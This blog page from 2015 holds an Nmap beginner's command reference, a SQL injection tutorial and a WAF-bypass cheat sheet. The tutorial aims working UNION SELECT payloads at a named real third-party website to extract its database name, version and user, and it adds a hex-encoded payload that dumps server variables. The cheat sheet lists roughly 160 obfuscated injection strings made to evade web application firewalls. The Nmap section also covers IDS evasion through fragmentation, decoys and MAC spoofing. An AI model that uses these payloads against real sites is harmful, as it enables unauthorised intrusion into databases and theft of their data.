Friday, May 1, 2015

Basic commands of Nmap For Beginners

                                            

nmap basics commands

                  

                                ~~~~With THE NAME OF ALLAH~~~~~~~

Namp  Definition::
    
Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich) used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses


Working of Namping ::
            The software provides a number of features for probing computer networks, including host discovery and service and operating system detection. These features are extensible by scripts that provide more advanced service detection, vulnerability detection,and other features. Nmap is also capable of adapting to network conditions including latency and congestion during a scan. Nmap is under development and refinement by its user community...

------------------------------------------------------------------------------------------------------------------------
                                           Basic Commands Of Nmap

---------------------------------------------
Scan a single ip address 
nmap 192.168.1.1

## Scan a host name ###
nmap server1.cyberciti.biz

## Scan a host name with more info
nmap -v server1.site.com

------------------------------------------------------------------------------------------
#2: Scan multiple IP address or subnet (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3
## works with same subnet i.e. 192.168.1.0/24
nmap 192.168.1.1,2,3
You can scan a range of IP address too:

nmap 192.168.1.1-20
You can scan a range of IP address using a wildcard:

nmap 192.168.1.*
Finally, you scan an entire subnet:

nmap 192.168.1.0/24
------------------------------------------------------------------------------------------
#3: Read list of hosts/networks from a file (IPv4)

The -iL option allows you to read the list of target systems using a text file. This is useful to scan a large number of hosts/networks. Create a text file as follows:
cat > /tmp/test.txt

Sample outputs:

server1.site.com
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost
The syntax is:

nmap -iL /tmp/test.txt
------------------------------------------------------------------------------------------
#4: Excluding hosts/networks (IPv4)

When scanning a large number of hosts/networks you can exclude(Kick out) hosts from a scan:

nmap 192.168.1.0/24 --exclude 192.168.1.5
nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254
OR exclude list from a file called /tmp/exclude.txt

nmap -iL /tmp/scanlist.txt --excludefile /tmp/exclude.txt
-------------------------------------------------------------------------------------
#5: Turn on OS and version detection scanning script (IPv4)

nmap -A 192.168.1.254
nmap -v -A 192.168.1.1
nmap -A -iL /tmp/scanlist.txt 
------------------------------------------------------------------------------------------
#6: Find out if a host/network is protected by a firewall

nmap -sA 192.168.1.254
nmap -sA server1.site.com
------------------------------------------------------------------------------------------
#7: Scan a host when protected by the firewall

nmap -PN 192.168.1.1
nmap -PN server1.site.com
------------------------------------------------------------------------------------------
#8: Scan an IPv6 host/address

The -6 option enable IPv6 scanning. The syntax is:

nmap -6 IPv6-Address-Here
nmap -6 server1.site.com
nmap -6 2607:f0d0:1002:51::4
nmap -v A -6 2607:f0d0:1002:51::4
------------------------------------------------------------------------------------------
#9: Scan a network and find out which servers and devices are up and running

This is known as host discovery or ping scan:

nmap -sP 192.168.1.0/24
------------------------------------------------------------------------------------------
#10: How do I perform a fast scan?

nmap -F 192.168.1.1
------------------------------------------------------------------------------------------
#11: Display the reason a port is in a particular state

nmap --reason 192.168.1.1
nmap --reason server1.site.com
------------------------------------------------------------------------------------------
#12: Only show open (or possibly open) ports

nmap --open 192.168.1.1
nmap --open server1.site.com
------------------------------------------------------------------------------------------
#13: Show all packets sent and received

nmap --packet-trace 192.168.1.1
nmap --packet-trace server1.site.com
------------------------------------------------------------------------------------------
14#: Show host interfaces and routes

This is useful for debugging (ip command or route command or netstat command like output using nmap)

nmap --iflist
--------------------------------------------
Sample outputs:
--------------------------------------------
Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 02:01 IST
************************INTERFACES************************
DEV    (SHORT)  IP/MASK          TYPE        UP MAC
lo     (lo)     127.0.0.1/8      loopback    up
eth0   (eth0)   192.168.1.5/24   ethernet    up B8:AC:6F:65:31:E5
vmnet1 (vmnet1) 192.168.121.1/24 ethernet    up 00:50:56:C0:00:01
vmnet8 (vmnet8) 192.168.179.1/24 ethernet    up 00:50:56:C0:00:08
ppp0   (ppp0)   10.1.19.69/32    point2point up

**************************ROUTES**************************
DST/MASK         DEV    GATEWAY
10.0.31.178/32   ppp0
209.133.67.35/32 eth0   192.168.1.2
192.168.1.0/0    eth0
192.168.121.0/0  vmnet1
192.168.179.0/0  vmnet8
169.254.0.0/0    eth0
10.0.0.0/0       ppp0
0.0.0.0/0        eth0   192.168.1.2
------------------------------------------------------------------------------------------
#15: How do I scan specific ports?

map -p [port] hostName
## Scan port 80
nmap -p 80 192.168.1.1

## Scan TCP port 80
nmap -p T:80 192.168.1.1

## Scan UDP port 53
nmap -p U:53 192.168.1.1

## Scan two ports ##
nmap -p 80,443 192.168.1.1

## Scan port ranges ##
nmap -p 80-200 192.168.1.1

## Combine all options ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.cyberciti.biz
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254

## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1

## Scan top ports i.e. scan $number most common ports ##
nmap --top-ports 5 192.168.1.1
nmap --top-ports 10 192.168.1.1
---- --------------------------------------
Sample outputs:
-------------------------------------------
Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:23 IST
Interesting ports on 192.168.1.1:
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios-ssn
443/tcp  closed https
445/tcp  closed microsoft-ds
3389/tcp closed ms-term-serv
MAC Address: BC:AE:C5:C3:16:93 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
------------------------------------------------------------------------------------------
 #16: The fastest way to scan all your devices/computers for open ports ever

nmap -T5 192.168.1.0/24

------------------------------------------------------------------------------------------

#17: How do I detect remote operating system?

You can identify a remote host apps and OS using the -O option:


nmap -O 192.168.1.1
nmap -O  --osscan-guess 192.168.1.1
nmap -v -O --osscan-guess 192.168.1.1
--------------------------------------------
Sample outputs:
--------------------------------------------
Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:29 IST
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 01:29
Scanning 192.168.1.1 [1 port]
Completed ARP Ping Scan at 01:29, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:29
Completed Parallel DNS resolution of 1 host. at 01:29, 0.22s elapsed
Initiating SYN Stealth Scan at 01:29
Scanning 192.168.1.1 [1000 ports]
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 22/tcp on 192.168.1.1
Completed SYN Stealth Scan at 01:29, 0.16s elapsed (1000 total ports)
Initiating OS detection (try #1) against 192.168.1.1
Retrying OS detection (try #2) against 192.168.1.1
Retrying OS detection (try #3) against 192.168.1.1
Retrying OS detection (try #4) against 192.168.1.1
Retrying OS detection (try #5) against 192.168.1.1
Host 192.168.1.1 is up (0.00049s latency).
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Device type: WAP|general purpose|router|printer|broadband router
Running (JUST GUESSING) : Linksys Linux 2.4.X (95%), Linux 2.4.X|2.6.X (94%), MikroTik RouterOS 3.X (92%), Lexmark embedded (90%), Enterasys embedded (89%), D-Link Linux 2.4.X (89%), Netgear Linux 2.4.X (89%)
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (95%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (94%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (94%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.6.15 - 2.6.23 (embedded) (92%), Linux 2.6.15 - 2.6.24 (92%), MikroTik RouterOS 3.0beta5 (92%), MikroTik RouterOS 3.17 (92%), Linux 2.6.24 (91%), Linux 2.6.22 (90%)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=11/27%OT=22%CT=1%CU=30609%PV=Y%DS=1%G=Y%M=BCAEC5%TM=50B3CA
OS:4B%P=x86_64-unknown-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CB%TI=Z%CI=Z%II=I%TS=7
OS:)OPS(O1=M2300ST11NW2%O2=M2300ST11NW2%O3=M2300NNT11NW2%O4=M2300ST11NW2%O5
OS:=M2300ST11NW2%O6=M2300ST11)WIN(W1=45E8%W2=45E8%W3=45E8%W4=45E8%W5=45E8%W
OS:6=45E8)ECN(R=Y%DF=Y%T=40%W=4600%O=M2300NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID
OS:=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 12.990 days (since Wed Nov 14 01:44:40 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Read data files from: /usr/share/nmap
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.38 seconds
           Raw packets sent: 1126 (53.832KB) | Rcvd: 1066 (46.100KB)
See also: Fingerprinting a web-server and a dns server command line tools for more information.
------------------------------------------------------------------------------------------
#18: How do I detect remote services (server / daemon) version numbers?

nmap -sV 192.168.1.1
Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:34 IST
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     Dropbear sshd 0.52 (protocol 2.0)
80/tcp open  http?
1 service unrecognized despite returning data.
------------------------------------------------------------------------------------------

#19: Scan a host using TCP ACK (PA) and TCP Syn (PS) ping

If firewall is blocking standard ICMP pings, try the following host discovery methods:

nmap -PS 192.168.1.1
nmap -PS 80,21,443 192.168.1.1
nmap -PA 192.168.1.1
nmap -PA 80,21,200-512 192.168.1.1
------------------------------------------------------------------------------------------

#20: Scan a host using IP protocol ping

nmap -PO 192.168.1.1
#21: Scan a host using UDP ping

This scan bypasses firewalls and filters that only screen TCP:

nmap -PU 192.168.1.1
nmap -PU 2000.2001 192.168.1.1

---------------------------------------------
---------------------------------------------
#22: Find out the most commonly used TCP ports using TCP SYN Scan


### Stealthy scan ###
nmap -sS 192.168.1.1

### Find out the most commonly used TCP ports using  TCP connect scan (warning: no stealth scan)
###  OS Fingerprinting ###
nmap -sT 192.168.1.1

### Find out the most commonly used TCP ports using TCP ACK scan
nmap -sA 192.168.1.1

### Find out the most commonly used TCP ports using TCP Window scan
nmap -sW 192.168.1.1

### Find out the most commonly used TCP ports using TCP Maimon scan
nmap -sM 192.168.1.1
 ---------------------------------------------------------------------------------
#23: Scan a host for UDP services (UDP scan)

Most popular services on the Internet run over the TCP protocol. DNS, SNMP, and DHCP are three of the most common UDP services. Use the following syntax to find out UDP services:

nmap -sU nas03
nmap -sU 192.168.1.1
Sample outputs:


Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 00:52 IST
Stats: 0:05:29 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 32.49% done; ETC: 01:09 (0:11:26 remaining)
Interesting ports on nas03 (192.168.1.12):
Not shown: 995 closed ports
PORT     STATE         SERVICE
111/udp  open|filtered rpcbind
123/udp  open|filtered ntp
161/udp  open|filtered snmp
2049/udp open|filtered nfs
5353/udp open|filtered zeroconf
MAC Address: 00:11:32:11:15:FC (Synology Incorporated)

Nmap done: 1 IP address (1 host up) scanned in 1099.55 seconds
--------------------------------------------------------
#24: Scan for IP protocol

This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines:

nmap -sO 192.168.1.1
------------------------------------------------------------------------------------------
#25: Scan a firewall for security weakness

The following scan types exploit a subtle loophole in the TCP and good for testing security of common attacks:


## TCP Null Scan to fool a firewall to generate a response ##
## Does not set any bits (TCP flag header is 0) ##
nmap -sN 192.168.1.254

## TCP Fin scan to check firewall ##
## Sets just the TCP FIN bit ##
nmap -sF 192.168.1.254

## TCP Xmas scan to check firewall ##
## Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree ##
nmap -sX 192.168.1.254

See how to block Xmas packkets, syn-floods and other conman attacks with iptables.

------------------------------------------------------------------------------------------
#26: Scan a firewall for packets fragments

The -f option causes the requested scan (including ping scans) to use tiny fragmented IP packets. The idea is to split up the TCP header over
several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing.

nmap -f 192.168.1.1
nmap -f fw2.nixcraft.net.in
nmap -f 15 fw2.nixcraft.net.in
## Set your own offset size with the --mtu option ##
nmap --mtu 32 192.168.1.1

----------------------------------------------------------------------------------
#27: Cloak a scan with decoys

The -D option it appear to the remote host that the host(s) you specify as decoys are scanning the target network too. Thus their IDS might report 5-10 port scans from unique IP addresses, but they won't know which IP was scanning them and which were innocent decoys:

nmap -n -Ddecoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip
nmap -n -D192.168.1.5,10.5.1.2,172.1.2.4,3.4.2.1 192.168.1.5
---------------------------------------------------------------------------------------
#28: Scan a firewall for MAC address spoofing


### Spoof your MAC address ##
nmap --spoof-mac MAC-ADDRESS-HERE 192.168.1.1

### Add other options ###
nmap -v -sT -PN --spoof-mac MAC-ADDRESS-HERE 192.168.1.1


### Use a random MAC address ###
### The number 0, means nmap chooses a completely random MAC address ###
nmap -v -sT -PN --spoof-mac 0 192.168.1.1
 -------------------------------------------------------------------------------------

#29: How do I save output to a text file?

The syntax is:

nmap 192.168.1.1 > output.txt
nmap -oN /path/to/filename 192.168.1.1
nmap -oN output.txt 192.168.1.1

------------------------------------------------------------------------------------------
My favorite nmap to scan for OS of a range of IPs, with output as a XML file:
nmap -A -T3 -oX MyFile.xml 192.168.56.101-120
(A: OS detection, version detection, script scanning, traceroute T3: Speed medium) (find this scan in details)

------------------------------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------------------------------


How To Print Mulitiple Variables/Funcation in SQL injection


Today I will Show you how to Print Multiple Variable and Functions in SQL injection:

multi function sql injection

Here Is the Cheat Sheet Of Multi Functions on SCreen :

@@port                     :           Check Ports
@@version_compile_os       :                        Check which Operationg system is running
@@CHARACTER_SET_FILESYSTEM :           tell File system :
@@version_compile_machine  :           Check 32 bit/64 bit
@@hostname           :               Current Hostname
@@tmpdir           :           Tept Directory
@@datadir           :               Data Directory
@@version           :           Version of DB
@@basedir           :               Base Directory
user()               :               Current User
database()           :               Current Database
version()           :               Version
schema()           :               current Database
UUID()               :               System UUID key
current_user()       :               Current User
current_user       :               Current User
system_user()       :               Current Sustem user
session_user()       :               Session user
@@GLOBAL.have_symlink  :           Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl   :               Check if it have ssl or not



Procedure : 

For this Purpose We shoul have Vulnerable site :

For Example ::

http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35

Print Multi values function






Here u can See Lot of Vlunerable Columns::
Now Going to print Database ,Version() ,User() ,@@ port etC ::


  • http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
  • http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
  • http://www.pelli.co.in/view_profile_byid.php?id=-15180 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 
-----------------------------------------------------------------------------------------------------------------------
 Now going To Print All functions At once for this Purpose We will use Concat ,Concat_ws, Or Make_set 
----------------------------------------------------------------------------------------------------------------------
concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e,0x3c62723e,0x7e7e696e6a6563742062792041666768616e697e7e3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e64617461626173653d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,database(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e76657273696f6e3d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,version(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e757365723d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,user(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e506f72743d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@port,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4f533d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@version_compile_os,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e424954532044455441494c533d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d626c75653e,@@version_compile_machine,0x3c666f6e7420636f6c6f723d677265656e3e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e46494c452053595354454d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@CHARACTER_SET_FILESYSTEM,0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x686f73746e616d653d3d,@@hostname,0x3c62723e,0x53797374656d2075756964206b65793d3d,UUID(),0x3c62723e,0x73796d6c696e6b3d3d,@@GLOBAL.have_symlink,0x3c62723e,0x53534c3d3d,@@GLOBAL.have_ssl,0x3c62723e,0x426173656469726563746f72793d3d,@@basedir)
--------------------------------------------------------------------------------------------------------------------------
Result::
--------------------------------------------------------------------------------------------------------------------------
How To  Print Mulitiple Variables/Funcation in SQL injection


-----------------------------------------------------------------------------------------------------------------------
How to coloring Watch This Video :::
-----------------------------------------------------------------------------------------------------------------------



------------------------------------------------------------------------------------------------------------------
Download Hackbar New Version From Here         HAckBAR
------------------------------------------------------------------------------------------------------------------

Saturday, April 25, 2015

byPassing Cheat Sheet Of ALL WAF



                                                  Cheat Sheet Of    UNION SELECT:::
This is The List of By Pass Union Select ::
----------------------------------------------------------------------------------------------------------------
  1. +union+distinct+select+
  2. +union+distinctROW+select+
  3. /**//*!12345UNION SELECT*//**/
  4. /**//*!50000UNION SELECT*//**/
  5. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  6. +/*!u%6eion*/+/*!se%6cect*/+
  7. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  8. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  9. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  10. union /*!50000%53elect*/
  11. %55nion %53elect
  12. +--+Union+--+Select+--+
  13. +UnIoN/*&a=*/SeLeCT/*&a=*/
  14. id=1+?UnI?On?+'SeL?ECT?
  15. id=1+'UnI'||'on'+SeLeCT'
  16. UnIoN SeLeCt CoNcAt(version())--
  17. uNiOn aLl sElEcT
  18. uUNIONnion all sSELECTelect 
  19. /*union*/union/*select*/select+1,2,3/*
  20. /*uniXon*/union/*selXect*/select+1,2/*
  21. un/**/ion+sel/**/ect
  22. +#1q%0Aunion all#qa%0A#%0Aselect
  23. union /*!select*/+
  24. union/**/select/**/
  25. /**/union/**/select/**/
  26. /**/union/*!50000select*/
  27. /**//*!12345UNION SELECT*//**/
  28. /**//*!50000UNION SELECT*//**/
  29. /**/uniUNIONon/**/selSELECTect/**/
  30. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  31. /**//*!union*//**//*!select*//**/
  32. /**/UNunionION/**/SELselectECT/**/
  33. /**//*UnIOn*//**//*SEleCt*//**/
  34. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  35. /**/UNunionION/**/all/**/SELselectECT/**/
  36. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  37. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  38. uni
  39. %20union%20/*!select*/%20
  40. union%23aa%0Aselect
  41. union+distinct+select+
  42. union+distinctROW+select+
  43. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  44. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  45. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  46. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  47. /*!u%6eion*/+/*!se%6cect*/+
  48. 1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  49. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  50. union /*!50000%53elect*/
  51. +%2F**/+Union/*!select*/
  52. %55nion %53elect
  53. +?+Union+?+Select+?+
  54. +UnIoN/*&a=*/SeLeCT/*&a=*/
  55. uNiOn aLl sElEcT
  56. uUNIONnion all sSELECTelect
  57. union(select(1),2,3)
  58. union (select 1111,2222,3333)
  59. union (/*!/**/ SeleCT */ 11)
  60. %0A%09UNION%0CSELECT%10NULL%
  61. /*!union*//*?*//*!all*//*?*//*!select*/
  62. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  63. union+sel%0bect
  64. +uni*on+sel*ect+
  65. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  66. union(select (1),(2),(3),(4),(5))
  67. UNION(SELECT(column)FROM(table))
  68. id=1+?UnI?On?+?SeL?ECT?
  69. id=1+?UnI?||?on?+SeLeCT?
  70. union select 1?+%0A,2?+%0A,3?+%0A etc ?
  71. /*!00000Union*/ /*!00000Select*/
  72. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  73. %55nion %53elect
  74. %55nion(%53elect 1,2,3)-- -
  75. +union+distinct+select+
  76. +union+distinctROW+select+
  77. /**//*!12345UNION SELECT*//**/
  78. /**//*!50000UNION SELECT*//**/
  79. /**/UNION/**//*!50000SELECT*//**/
  80. /*!50000UniON SeLeCt*/
  81. union /*!50000%53elect*/
  82. + #?uNiOn + #?sEleCt
  83. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  84. /*!%55NiOn*/ /*!%53eLEct*/
  85. /*!u%6eion*/ /*!se%6cect*/
  86. +un/**/ion+se/**/lect
  87. uni%0bon+se%0blect
  88. %2f**%2funion%2f**%2fselect
  89. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  90. REVERSE(noinu)+REVERSE(tceles)
  91. /*--*/union/*--*/select/*--*/
  92. union (/*!/**/ SeleCT */ 1,2,3)
  93. /*!union*/+/*!select*/
  94. union+/*!select*/
  95. /**/union/**/select/**/
  96. /**/uNIon/**/sEleCt/**/
  97. +%2F**/+Union/*!select*/
  98. /**//*!union*//**//*!select*//**/
  99. /*!uNIOn*/ /*!SelECt*/
  100. +union+distinct+select+
  101. +union+distinctROW+select+
  102. uNiOn aLl sElEcT
  103. UNIunionON+SELselectECT
  104. /**/union/*!50000select*//**/
  105. 0%a0union%a0select%09
  106. %0Aunion%0Aselect%0A
  107. %55nion/**/%53elect
  108. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  109. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  110. %0A%09UNION%0CSELECT%10NULL%
  111. /*!union*//*--*//*!all*//*--*//*!select*/
  112. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  113. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  114. +UnIoN/*&a=*/SeLeCT/*&a=*/
  115. union+sel%0bect
  116. +uni*on+sel*ect+
  117. +#1q%0Aunion all#qa%0A#%0Aselect
  118. union(select (1),(2),(3),(4),(5))
  119. UNION(SELECT(column)FROM(table))
  120. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  121. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  122. union(select(1),2,3)
  123. union (select 1111,2222,3333)
  124. uNioN (/*!/**/ SeleCT */ 11)
  125. union (select 1111,2222,3333)
  126. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  127. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  128. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  129. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  130. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  131. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  132. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  133. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  134. /union\sselect/g
  135. /union\s+select/i
  136. /*!UnIoN*/SeLeCT
  137. +UnIoN/*&a=*/SeLeCT/*&a=*/
  138. +uni>on+sel>ect+
  139. +(UnIoN)+(SelECT)+
  140. +(UnI)(oN)+(SeL)(EcT)
  141. +?UnI?On?+'SeL?ECT?
  142. +uni on+sel ect+
  143. +/*!UnIoN*/+/*!SeLeCt*/+
  144. /*!u%6eion*/ /*!se%6cect*/
  145. uni%20union%20/*!select*/%20
  146. union%23aa%0Aselect
  147. /**/union/*!50000select*/
  148. /^.*union.*$/ /^.*select.*$/
  149. /*union*/union/*select*/select+
  150. /*uni X on*/union/*sel X ect*/
  151. +un/**/ion+sel/**/ect+
  152. +UnIOn%0d%0aSeleCt%0d%0a
  153. UNION/*&test=1*/SELECT/*&pwn=2*/
  154. un?+un/**/ion+se/**/lect+
  155. +UNunionION+SEselectLECT+
  156. +uni%0bon+se%0blect+
  157. %252f%252a*/union%252f%252a /select%252f%252a*/
  158. /%2A%2A/union/%2A%2A/select/%2A%2A/
  159. %2f**%2funion%2f**%2fselect%2f**%2f
  160. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  161. /*!UnIoN*/SeLecT+
-----------------------------------------------------------------------------------------------------------------------
Union Select  by PASS with Url Encoded Method:
-----------------------------------------------------------------------------------------------------------------------
  1. %55nion(%53elect)
  2. union%20distinct%20select
  3. union%20%64istinctRO%57%20select
  4. union%2053elect
  5. %23?%0auion%20?%23?%0aselect
  6. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  7. %55nion %53eLEct
  8. u%6eion se%6cect
  9. unio%6e %73elect
  10. unio%6e%20%64istinc%74%20%73elect
  11. uni%6fn distinct%52OW s%65lect
  12. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

---------------------------------------------------------------------------------------------------------------------
Cheat Sheet of Bypassing Of Order by And Group By
---------------------------------------------------------------------------------------------------------------------

  1.  order by/**_**/
  2. /*!12345order*/ /*!12345by*/
  3. ) order by 1-- -
  4. ') order by 1-- -

  5. ')order by 1%23%23

  6. %')order by 1%23%23

  7. Null' order by 100--+

  8. Null' order by 9999--+

  9. ')group by 99-- -

  10. 'group by 119449-- -

  11. 'group/**/by/**/99%23%23
------------------------------------------------------------------------------------------------------------------------Concat And Group_concat By Pass cheat Sheet ::
------------------------------------------------------------------------------------------------------------------------


  1. /*!12345group_concat*/(/*!12345table_name*/)
  2. /*!50000group_concat*/(/*!50000table_name*/)
  3. /*!GrOuP_ConCaT*/()
  4. /*!12345GroUP_ConCat*/()
  5. /*!50000gRouP_cOnCaT*/()
  6. /*!50000Gr%6fuP_c%6fnCAT*/()
  7. /*!group_concat*/()
  8. gRoUp_cOnCAt()
  9. group_concat(/*!*/)
  10. group_concat(/*!12345table_name*/)
  11. group_concat(/*!50000table_name*/)
  12. /*!group_concat*/(/*!12345table_name*/)
  13. /*!group_concat*/(/*!50000table_name*/)
  14. unhex(hex(group_concat(table_name)))
  15. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  16. unhex(hex(/*!12345group_concat*/(table_name)))
  17. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  18. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  19. unhex(hex(/*!50000group_concat*/(table_name)))
  20. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  21. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  22. CONVERT(group_concat(table_name)+USING+latin1)
  23. CONVERT(group_concat(table_name)+USING+latin2)
  24. CONVERT(group_concat(table_name)+USING+latin3)
  25. CONVERT(group_concat(table_name)+USING+latin4)
  26. CONVERT(group_concat(table_name)+USING+latin5)
  27. convert(group_concat(table_name)+using+ascii)
  28. convert(group_concat(/*!table_name*/)+using+ascii)
  29. convert(group_concat(/*!12345table_name*/)+using+ascii)
  30. convert(group_concat(/*!50000table_name*/)+using+ascii)
  31. /*!concat_ws(0x3a,)*/
  32. concat_ws(0x3a3a3a,version()
  33. CONCAT_WS(CHAR(32,58,32),version(),)
----------------------------------------------------------------------------------------------------------------
How to By Pass Tables:::
---------------------------------------------------------------------------------------------------------------
group_concat(/*!table_name*/)

